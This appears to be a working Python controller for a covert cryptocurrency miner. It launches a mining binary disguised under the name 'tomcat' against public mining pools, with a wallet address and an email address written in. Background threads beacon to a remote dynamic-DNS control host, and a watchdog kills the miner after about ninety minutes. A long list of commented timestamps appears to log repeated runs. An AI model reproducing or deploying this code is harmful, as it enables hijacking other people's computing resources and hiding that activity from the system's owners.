import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:18:04.563493
#2018-02-17 17:07:05.785151
#2018-02-17 18:55:04.287428
#2018-02-17 20:43:05.457642
#2018-02-17 22:30:09.757686
#2018-02-18 00:12:07.608606
#2018-02-18 02:04:06.351048
#2018-02-18 03:50:05.669734
#2018-02-18 05:38:03.744879
#2018-02-18 07:31:03.545034
#2018-02-18 09:19:07.160379
#2018-02-18 11:05:06.018015
#2018-02-18 12:52:06.264546
#2018-02-18 14:38:07.865072
#2018-02-18 16:27:03.665897
#2018-02-18 18:16:01.709251
#2018-02-18 20:01:06.642903
#2018-02-18 21:48:06.899494
#2018-02-18 23:37:04.115097
#2018-02-19 01:22:06.756804
#2018-02-19 03:10:05.153730
#2018-02-19 04:55:01.483741
#2018-02-19 06:40:02.988069
#2018-02-19 08:30:07.603621
#2018-02-19 10:19:07.417485
#2018-02-19 12:07:07.091738
#2018-02-19 13:53:06.660767
#2018-02-19 15:43:05.251895
#2018-02-19 17:29:05.528067
#2018-02-19 19:17:06.366758
#2018-02-19 21:05:02.980828
#2018-02-19 22:50:08.648651
#2018-02-20 00:34:01.408394
#2018-02-20 02:22:05.903058
#2018-02-20 04:12:05.185745
#2018-02-20 05:55:07.416675
#2018-02-20 07:41:07.937080
#2018-02-20 09:27:01.668719
#2018-02-20 11:10:10.833625
#2018-02-20 12:57:01.968691
#2018-02-20 14:41:04.227752
#2018-02-20 16:26:06.760141
#2018-02-20 18:12:07.724775
#2018-02-20 20:05:07.643138
#2018-02-20 21:53:01.971014
#2018-02-20 23:34:07.263608
#2018-02-21 01:19:05.144906
#2018-02-21 03:06:05.382260
#2018-02-21 04:53:05.234067
#2018-02-21 06:42:05.870676
#2018-02-21 08:29:07.636230
#2018-02-21 10:14:07.077736
#2018-02-21 12:03:06.896076
#2018-02-21 13:51:07.539009
#2018-02-21 15:35:11.573778
#2018-02-21 17:24:04.791868
#2018-02-21 19:13:01.517855
#2018-02-21 21:03:01.971408
#2018-02-21 22:49:05.232468
#2018-02-22 00:37:07.278361
#2018-02-22 02:24:01.816810
#2018-02-22 04:11:04.043725
#2018-02-22 05:55:05.662093
#2018-02-22 07:43:06.291507
#2018-02-22 09:32:07.031611
#2018-02-22 11:18:03.093539
#2018-02-22 13:03:04.734207
#2018-02-22 14:49:10.421130
#2018-02-22 16:35:09.225477
#2018-02-22 18:20:04.081177
#2018-02-22 20:11:06.539127
#2018-02-22 21:57:06.641377
#2018-02-23 00:58:11.393790
#2018-02-23 02:47:04.049879
#2018-02-23 04:35:06.089487
#2018-02-23 06:21:05.940560
#2018-02-23 08:08:04.191876
#2018-02-23 10:26:01.712852
#2018-02-23 13:16:08.360738
#2018-02-23 15:01:08.587785
#2018-02-23 16:49:08.716835
#2018-02-23 18:41:06.145529
#2018-02-23 20:28:06.327643
#2018-02-23 22:17:08.704819
#2018-02-24 00:03:08.278610
#2018-02-24 01:53:07.219189
#2018-02-24 03:44:01.324293
#2018-02-24 05:33:06.392957
#2018-02-24 07:19:07.114852
#2018-02-24 09:09:04.951531
#2018-02-24 10:47:03.997566
#2018-02-24 12:27:07.744693
#2018-02-24 14:03:06.488218
#2018-02-24 15:46:04.188539
#2018-02-24 17:20:08.532809
#2018-02-24 18:53:07.060374
#2018-02-24 20:25:04.795258
#2018-02-24 21:56:01.553660
#2018-02-25 02:34:06.971497
#2018-02-25 06:16:07.760056
#2018-02-25 11:40:09.097176